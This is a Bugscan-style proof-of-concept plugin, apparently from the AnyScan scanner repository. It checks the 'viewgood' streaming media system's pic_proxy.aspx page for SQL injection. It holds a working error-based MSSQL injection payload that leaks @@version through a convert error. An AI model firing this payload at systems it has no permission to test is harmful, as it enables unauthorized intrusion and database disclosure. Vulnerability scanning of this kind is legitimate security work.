/AnyScanUI/AnyPoc/data/poc/bugscan/exp-2441.py

https://github.com/zhangzhenfeng/AnyScan · Python · 23 lines · 12 code · 7 blank · 4 comment · 4 complexity · 77a4933234b11801466519b156ae3d5d MD5 · raw file

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #__Author__ = 烽火戏诸侯
  4. #_PlugName_ = 远古流媒体系统 pic_proxy.aspx注入漏洞
  5. def assign(service, arg):
  6. if service == "viewgood":
  7. return True, arg
  8. def audit(arg):
  9. payload ='viewgood/webmedia/portal/pic_proxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2'
  10. target = arg + payload
  11. code, head, res, errcode, _ = curl.curl2(target)
  12. if code == 500 and 'tyqMicrosoft SQL Server' in res:
  13. security_hole(target)
  14. return arg
  15. if __name__== '__main__':
  16. from dummy import *